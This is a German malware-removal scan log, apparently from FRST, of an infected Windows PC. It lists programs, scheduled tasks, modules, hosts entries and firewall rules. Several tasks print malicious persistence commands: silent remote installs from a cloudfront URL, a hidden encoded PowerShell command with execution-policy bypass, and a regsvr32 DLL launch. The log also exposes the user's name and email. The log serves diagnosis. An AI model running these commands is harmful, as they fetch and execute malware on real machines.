Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022.218 (HKLM-x32\...\{E503B4BF-F7BB-3D5F-8BC8-F694B1CFF942}) (Version: 9.0.21022.218 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 53.0.3 (x64 de) (HKLM\...\Mozilla Firefox 53.0.3 (x64 de)) (Version: 53.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 53.0.3 - Mozilla)
OpenOffice 4.1.3 (HKLM-x32\...\{8D5FCC56-BB9F-4122-923C-71753F50F6F5}) (Version: 4.13.9783 - Apache Software Foundation)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
Skype™ 7.33 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.33.105 - Skype Technologies S.A.)
SpyHunter 4 (HKLM-x32\...\SpyHunter) (Version: 4.24.3.4750 - Enigma Software Group, LLC)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
SwytShop version 1.0 (HKU\.DEFAULT\...\SwytShopAlgoadChrome_Pkg3a_is1) (Version: 1.0 - SwytShop)
TeamViewer 12 (HKLM-x32\...\TeamViewer) (Version: 12.0.77242 - TeamViewer)
VirtualDJ 8 (HKLM-x32\...\{2C513174-818D-4D9E-B88F-3E2872BACA20}) (Version: 8.2.3493.0 - Atomix Productions)
VLC media player (HKLM\...\VLC media player) (Version: 2.2.4 - VideoLAN)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 5.40 (32-Bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-3847841184-804715454-2304624315-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Nick Schuster\AppData\Local\Microsoft\OneDrive\17.3.6799.0327\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3847841184-804715454-2304624315-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation)
CustomCLSID: HKU\S-1-5-21-3847841184-804715454-2304624315-1001_Classes\CLSID\{D3BB05A4-7B0B-D6FE-9C46-02343C11E1C8}\InprocServer32 -> kein Dateipfad
CustomCLSID: HKU\S-1-5-21-3847841184-804715454-2304624315-1001_Classes\CLSID\{DC9D74AA-7319-69B5-E1DE-59842454B0BE}\InprocServer32 -> kein Dateipfad

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {006195E7-5B35-4800-8C6E-E8E48BDE5D59} - System32\Tasks\KMSAutoNet => C:\ProgramData\KMSAutoS\KMSAuto Net.exe
Task: {05D48E00-BF2C-4CEB-B7DF-04409233784E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-03-17] (Google Inc.)
Task: {12EA2644-53AB-4F3B-8420-DDC68495A6C2} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
Task: {1400CED9-EAA0-49F8-A50B-2477914720B4} - System32\Tasks\Games\UpdateCheck_S-1-5-21-3847841184-804715454-2304624315-1001
Task: {16129431-3A87-44D6-B1E9-5B37A253A591} - System32\Tasks\RunAtStartup => C:\Users\Nick Schuster\AppData\Roaming\Event Monitor\em.exe
Task: {169116B2-0EF1-475C-8491-807AAB8364E3} - System32\Tasks\Microsoft\Windows\DeviceSettings\Puperpysikuy => /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&amp;d=20170529 /q
Task: {2A619B04-44F2-4A39-B52E-0AD07E393C91} - System32\Tasks\Prervadom Cloud => C:\Program Files (x86)\Mlecultfowudom\zerfotain.exe
Task: {2E2640BC-9462-4C5F-90BD-892338D59DF4} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-06-01] ()
Task: {49A10F24-190A-4ED7-9B48-C3CB6BBBC914} - System32\Tasks\GenericSettingsHandler\Windows-Credentials\RetrySyncTask_for_S-1-5-21-3847841184-804715454-2304624315-1001
Task: {53A67BD4-6351-4805-A436-9353CBFAAAFA} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-wiiu02015@outlook.de => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe
Task: {6557BCB6-2F27-448C-ACA4-7E86E4B009E5} - System32\Tasks\Update => C:\Users\Nick
Task: {673824BA-7A3C-41BF-A4DA-9C4F9887830A} - System32\Tasks\Red Giant Link => C:\Program Files\Red Giant Link\Red Giant Link.exe
Task: {6AFC3B2B-BD1E-4624-B0FF-60E210D98357} - \task Update -> Keine Datei <==== ACHTUNG
Task: {72FEC8A9-7468-4164-9720-A650AB414362} - System32\Tasks\ttwifi => C:\Program Files (x86)\ttwifi\tiantianwifi.exe
Task: {74DECB46-8172-4D8D-A795-B4201324F918} - System32\Tasks\Qizsywosale Core => C:\Program Files (x86)\Fepuly\xruvudom.exe
Task: {7DF225F2-E9BE-467E-BBE5-6136CE240342} - System32\Tasks\Quick Tharks Screen Saver => Rundll32.exe "C:\Program Files\Quick Tharks Screen Saver\Quick Tharks Screen Saver.dll",eJRVBzCDxduB
Task: {9376D540-EE5F-4016-8595-273CB525CC42} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\Windows\system32\MRT.exe [2017-05-23] (Microsoft Corporation)
Task: {99A7E8C2-308C-41FF-85F1-8EC686E05AE2} - System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-3847841184-804715454-2304624315-1001 => C:\Users\Nick Schuster\AppData\Local\Microsoft\OneDrive\OneDrive.exe [2017-04-15] (Microsoft Corporation)
Task: {9BC09D15-0FE3-42E6-917C-A7AEE41F44B8} - System32\Tasks\Samsung Update => /i hxxp://D2Buh1bF1G584W.CLouDfRoNT.net/mmtsk/occup.php?p=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&amp;d=20170418 /q
Task: {9C8653D0-0863-4F6C-BDC9-E813956ACA92} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe
Task: {A885A6AF-A8B5-484C-9416-15C01E02D67D} - System32\Tasks\fyKiuMkkXh => C:\Program Files (x86)\XIOLoa7MyU\updengine.exe
Task: {B109EF88-6721-40A7-B261-9D175E298958} - System32\Tasks\Coobeck Monitor => C:\Program Files (x86)\Arucerther\yaupdcache.exe
Task: {B76D98BF-21F4-4F78-A43A-95F8B72AD43D} - System32\Tasks\{0B047F47-0F0A-0408-0B11-087F0C0B110F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ADsAIAAgADsAOwA7ACAAIAAgADsAOwAgADsAOwA7ADsAIAA7ADsAOwA7ADsAOwA7ACAAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA (Der Dateneintrag hat 9580 mehr Zeichen).
Task: {B8732800-4537-42E1-8E92-0D38D2678C49} - System32\Tasks\OneDrive Standalone Update Task v2 => C:\Users\Nick Schuster\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe [2017-05-13] ()
Task: {D18984F6-6A81-40A8-A7A5-020084C99227} - System32\Tasks\{C8763487-4C07-317B-EF0E-D6F917015462} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\575f1242\3bf5ca72.dll" <==== ACHTUNG
Task: {D4BAA7ED-86EB-4B60-9F30-8E2D64B7D175} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-09] (Adobe Systems Incorporated)
Task: {D66B17AC-FEAC-46B3-A7DF-3865C135032C} - System32\Tasks\Microsoft\Windows\MemoryDiagnostic\VideoMemoryDiagnostic => C:\\ProgramData\\VideoMemoryDiagnostic\\vmdiag.exe [2017-05-26] ()
Task: {D74DB4BE-DE57-43E2-97AF-575D2663AEE8} - System32\Tasks\Perkeentgreserk => /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&amp;v=20170316 /q
Task: {DBE77801-9F7F-4CE7-9DE2-FDB39098637C} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_25_0_0_171_pepper.exe [2017-05-09] (Adobe Systems Incorporated)
Task: {E6C4E4E8-090E-49DF-8E3F-70FC88E8E56F} - System32\Tasks\{25FE2E5B-9255-99F0-1368-8A42E54326C9} => C:\ProgramData\{279BD4C5-9030-636E-34A5-319E03364EE3}\63E4E652-D44F-51F9-5689-B0A4B2295152.exe [2017-06-02] () <==== ACHTUNG
Task: {EC667399-8041-43FD-BACE-C95F53D20EC6} - System32\Tasks\SoftUpgrade => C:\Program Files (x86)\SoftUpgrade\softup.exe [2017-05-29] ()
Task: {F51F669D-34D8-49E3-9371-1DA093A90419} - System32\Tasks\Gerfety Renew => C:\Program Files (x86)\Prfasaretaly\yaupdcache.exe [2017-05-29] ()
Task: {F6691563-4A82-4630-97F5-2AD5B410283B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-03-17] (Google Inc.)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Verkn黳fungen =============================

(Die Eintr鋑e k鰊nen gelistet werden, um sie zur點kzusetzen oder zu entfernen.)

Shortcut: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Applemy\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Applemy\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\d6731079c9ca4513\Google Chrome.lnk -> C:\Program Files (x86)\Applemy\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\8e5c0db72600a899\Google Chrome.lnk -> C:\Program Files (x86)\Applemy\Application\chrome.exe (Google Inc.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2016-08-21 10:29 - 2016-08-21 10:29 - 00594944 _____ () C:\Program Files\EqualizerAPO\EqualizerAPO.dll
2015-11-22 22:05 - 2015-11-22 22:05 - 01530880 _____ () C:\Program Files\EqualizerAPO\libsndfile-1.dll
2014-03-15 23:29 - 2014-03-15 23:29 - 02604934 _____ () C:\Program Files\EqualizerAPO\libfftw3f-3.dll
2017-03-17 00:03 - 2017-03-17 00:03 - 00306688 _____ () C:\Program Files (x86)\Qizsywosale Core\local64spl.dll
2017-05-29 22:00 - 2015-06-01 01:57 - 02445824 _____ () C:\Program Files\Quick Tharks Screen Saver\Quick Tharks Screen Saver.dll
2017-02-27 11:37 - 2016-02-04 12:53 - 00387144 _____ () C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE
2017-06-02 14:07 - 2017-06-03 13:57 - 00307200 _____ () C:\Windows\TEMP\g50DA.tmp.exe
2017-06-02 14:07 - 2017-06-03 13:57 - 00481280 _____ () C:\Windows\TEMP\g50DC.tmp.exe
2015-08-09 05:50 - 2016-10-07 00:07 - 00393208 _____ () C:\Windows\system32\igfxTray.exe
2017-06-01 00:15 - 2017-01-03 13:20 - 01052256 _____ () C:\ProgramData\windows\windows.exe
2017-05-31 13:52 - 2017-05-31 07:18 - 00101528 _____ () C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
2017-05-08 16:50 - 2017-06-01 12:00 - 01886720 _____ () c:\users\nick schuster\appdata\roaming\winsapsvc\winsap.dll
2017-03-28 19:38 - 2017-03-28 04:48 - 00105984 _____ () c:\programdata\package cache\{2a002f88-fd5d-379b-a350-a25d84af128b}v14.0.25420\packages\visualc_d14\vc_ide.base\vc_ide_base.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== EXE Verkn黳fungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zur點kgesetzt oder entfernt.)


==================== Internet Explorer Vertrauensw黵dig/Eingeschr鋘kt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ==========================

(Wenn ben鰐igt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zur點kzusetzen.)

2016-11-23 18:06 - 2017-05-30 13:55 - 00013624 ____A C:\Windows\system32\Drivers\etc\hosts

127.0.0.1 rad.msn.com
127.0.0.1 live.rads.msn.com
127.0.0.1 ads1.msn.com
127.0.0.1 g.msn.com
127.0.0.1 a.ads2.msads.net
127.0.0.1 b.ads2.msads.net
127.0.0.1 ac3.msn.com
127.0.0.1 apps.skype.com
127.0.0.1 clients2.google.com 
127.0.0.1 v1.ff.avast.com 
127.0.0.1 vlcproxy.ff.avast.com 
127.0.0.1 wemsofts.com
127.0.0.1 bongadoom.com
127.0.0.1 wepcmainsystem.com
127.0.0.1 internalcampaigntargets.com
127.0.0.1 bongadoom.com
127.0.0.1 getthefilenow.com
127.0.0.1 bigpicturepop.com
127.0.0.1 wizzcaster.com
127.0.0.1 bestoffersfortoday.com
127.0.0.1 wepcmainsystem.com
127.0.0.1 agent.wizztrakys.com
127.0.0.1 csdimonetize.com
127.0.0.1 dl.azalee.site
127.0.0.1 titiaredh.com
127.0.0.1 wepcdisplaysystem.com
127.0.0.1 wepcanalyticsystem.com
127.0.0.1 healthydownload.com
127.0.0.1 leading2download.com
127.0.0.1 dwl0.wizzlabs.com

Da befinden sich 364 zus鋞zliche Eintr鋑e.


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix f黵 diesen Bereich.)

HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows Photo Viewer\Hintergrundbild der Windows-Fotoanzeige.jpg
DNS Servers: 8.8.8.8 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Eintr鋑e ==

(Aktuell gibt es keinen automatisierten Fix f黵 diesen Bereich.)

MSCONFIG\Services: AppleAppSvc => 2
MSCONFIG\Services: AppleCloudSvc => 2
MSCONFIG\Services: BDESVC => 3
MSCONFIG\Services: BITS => 2
MSCONFIG\Services: DbxSvc => 2
MSCONFIG\Services: KingoSoftService => 2
MSCONFIG\Services: Kitty => 2
MSCONFIG\Services: pgt_svc => 2
MSCONFIG\Services: Recover => 2
MSCONFIG\Services: srcsrv => 2
MSCONFIG\Services: SysLinkMapper => 2
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run: => "vnlgp"
HKLM\...\StartupApproved\Run: => "AirServer64"
HKLM\...\StartupApproved\Run: => "gplyra"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "BlueStacks Agent"
HKLM\...\StartupApproved\Run32: => "KMS"
HKLM\...\StartupApproved\Run32: => "Dropbox"
HKLM\...\StartupApproved\Run32: => "KiesTrayAgent"
HKLM\...\StartupApproved\Run32: => "IJNetworkScannerSelectorEX"
HKLM\...\StartupApproved\Run32: => "CanonQuickMenu"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\StartupFolder: => "smss.exe"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "Spotify"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "Spotify Web Helper"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "HKOEGBGL4X"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "tsiVideo"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "Spiele Post"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "6CC2RLD170"
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartupApproved\Run: => "Google Updater 2.0"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [TCP Query User{22AB143C-8D2D-4A97-8DD0-BA531B1CC8C0}C:\program files (x86)\java\jre1.8.0_66\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre1.8.0_66\bin\javaw.exe
FirewallRules: [UDP Query User{96E2CDFB-4366-4001-B896-915F472C33C7}C:\program files (x86)\java\jre1.8.0_66\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre1.8.0_66\bin\javaw.exe
FirewallRules: [TCP Query User{08BD94A2-3AB2-4176-BFA3-6ECD3237AF6A}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{A093A1CB-FFE2-41F2-8755-748DAFCA91D3}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{B8EFB49A-616F-4DCE-8DAB-00382F0142DB}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{26CEF901-32C1-48FD-B121-1CCDA0B2B727}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{9093F9AF-59BF-4438-901B-55A2BCA47AAF}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{E3F33213-2D1F-451B-8111-0C2145F24BB2}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [TCP Query User{86241E34-E8BA-4BC3-85B5-7A1BF84E7249}C:\program files (x86)\steam\steamapps\common\tom clancy's ghost recon phantoms - eu\game\pdc-live\ghostreconphantoms.exe] => (Block) C:\program files (x86)\steam\steamapps\common\tom clancy's ghost recon phantoms - eu\game\pdc-live\ghostreconphantoms.exe
FirewallRules: [UDP Query User{BB112180-BAC4-4667-A338-483250E2DDE3}C:\program files (x86)\steam\steamapps\common\tom clancy's ghost recon phantoms - eu\game\pdc-live\ghostreconphantoms.exe] => (Block) C:\program files (x86)\steam\steamapps\common\tom clancy's ghost recon phantoms - eu\game\pdc-live\ghostreconphantoms.exe
FirewallRules: [{67FE29D8-F9EC-4911-A8FD-4DA5EB1CC57E}] => (Allow) C:\Users\Nick Schuster\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{73E1D05C-E37A-49D0-9EEF-3F095697DF28}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{D8F57116-C8F8-4A7A-A754-306A6CA0C90D}] => (Allow) LPort=2869
FirewallRules: [{F66DF897-E8A8-4CB8-9052-E1FB7F5C4AD5}] => (Allow) LPort=1900
FirewallRules: [{73EDF2AF-E150-4E83-AF4F-A1F19E84F9EC}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [TCP Query User{DE14579F-7B4B-4280-BB0A-C30A54A3B6C6}C:\program files (x86)\java\jre1.8.0_91\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre1.8.0_91\bin\javaw.exe
FirewallRules: [UDP Query User{5135D920-7EB9-48CC-98A9-F97B5A6315D1}C:\program files (x86)\java\jre1.8.0_91\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre1.8.0_91\bin\javaw.exe
FirewallRules: [TCP Query User{000568FB-833E-4074-9BF9-E65421169028}C:\program files (x86)\java\jre1.8.0_91\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre1.8.0_91\bin\javaw.exe
FirewallRules: [UDP Query User{D8AEB9CF-BCEE-48A1-B5F2-D15985DE2D8C}C:\program files (x86)\java\jre1.8.0_91\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre1.8.0_91\bin\javaw.exe
FirewallRules: [{B700AFED-8A4C-4D2B-9531-88AE1F0961DF}] => (Allow) C:\Program Files (x86)\GlassWire\GWCtlSrv.exe
FirewallRules: [{A9CEE88F-19AC-40D4-B1E0-1CE9ADA40CEA}] => (Allow) C:\Program Files (x86)\GlassWire\GWCtlSrv.exe
FirewallRules: [TCP Query User{15F9F589-2E16-488F-A735-46B4687E0A25}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{9E9FDBC5-6384-4D1D-810B-ABAC18CAE71E}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{185173E7-A203-4A22-A422-CE964D957E81}C:\program files\java\jre1.8.0_101\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_101\bin\javaw.exe
FirewallRules: [UDP Query User{494306F8-0AFD-4162-84F4-20CC75C86288}C:\program files\java\jre1.8.0_101\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_101\bin\javaw.exe
FirewallRules: [TCP Query User{A5A5FDEC-CF06-4BD4-B0A0-6BC84A789F7B}C:\users\nick schuster\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\nick schuster\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{0864A6DE-1108-42B0-8EED-DAFDE57300E2}C:\users\nick schuster\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\nick schuster\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{0FCE7EA3-D45A-4939-9F66-5519BC75F92C}C:\program files\adobe\adobe after effects cs6\support files\afterfx.exe] => (Allow) C:\program files\adobe\adobe after effects cs6\support files\afterfx.exe
FirewallRules: [UDP Query User{FD3E8EB7-E26C-4BCC-A156-9B91C355B3E7}C:\program files\adobe\adobe after effects cs6\support files\afterfx.exe] => (Allow) C:\program files\adobe\adobe after effects cs6\support files\afterfx.exe
FirewallRules: [TCP Query User{EDE1FD40-AA4B-4EF0-959C-F8CE1A605D15}C:\program files\adobe\adobe after effects cs6\support files\afterfx.exe] => (Allow) C:\program files\adobe\adobe after effects cs6\support files\afterfx.exe
FirewallRules: [UDP Query User{62B95D88-E6FA-4DA3-A731-F12CE4454A71}C:\program files\adobe\adobe after effects cs6\support files\afterfx.exe] => (Allow) C:\program files\adobe\adobe after effects cs6\support files\afterfx.exe
FirewallRules: [TCP Query User{1219B3DD-72AC-4318-BDB6-10CC2D867F71}C:\program files\java\jre1.8.0_111\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_111\bin\javaw.exe
FirewallRules: [UDP Query User{E532A6F6-9983-4D4B-AD87-FB0154588B9A}C:\program files\java\jre1.8.0_111\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_111\bin\javaw.exe
FirewallRules: [TCP Query User{B9299B44-1342-40FC-AF31-121EAEEA8CE6}C:\program files\java\jre1.8.0_111\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_111\bin\javaw.exe
FirewallRules: [UDP Query User{EA9B50E4-1481-469A-9A3B-7B29917064B6}C:\program files\java\jre1.8.0_111\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_111\bin\javaw.exe
FirewallRules: [TCP Query User{A836AADE-AAF1-490E-A824-2379A923DEA2}C:\users\nick schuster\documents\move or die\love\win\love.exe] => (Block) C:\users\nick schuster\documents\move or die\love\win\love.exe
FirewallRules: [UDP Query User{A327B216-10EA-4777-81F3-F7E411B925C3}C:\users\nick schuster\documents\move or die\love\win\love.exe] => (Block) C:\users\nick schuster\documents\move or die\love\win\love.exe
FirewallRules: [{08CB5F11-70F8-4D75-A111-4E1E8BBD9E3E}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{8A58A32F-5A08-4A6A-82A7-884402B2A3A9}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [TCP Query User{440E6BBA-8081-42E8-A3EB-227467E44FF0}C:\users\nick schuster\documents\move or die\love\win\love.exe] => (Block) C:\users\nick schuster\documents\move or die\love\win\love.exe
FirewallRules: [UDP Query User{192F493E-9BEA-4B3F-A07E-DC925E5A956B}C:\users\nick schuster\documents\move or die\love\win\love.exe] => (Block) C:\users\nick schuster\documents\move or die\love\win\love.exe
FirewallRules: [{55D8B042-B4DB-4BDC-8388-40CAEE3B6280}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
FirewallRules: [TCP Query User{1E2DE2A6-4A6F-48DD-AFFF-3754FB938712}C:\users\nick schuster\desktop\helloneighbor_pre_alpha_-_play_at_your_own_risk\helloneighbor\helloneighbour\binaries\win64\helloneighbour-win64-shipping.exe] => (Allow) C:\users\nick schuster\desktop\helloneighbor_pre_alpha_-_play_at_your_own_risk\helloneighbor\helloneighbour\binaries\win64\helloneighbour-win64-shipping.exe
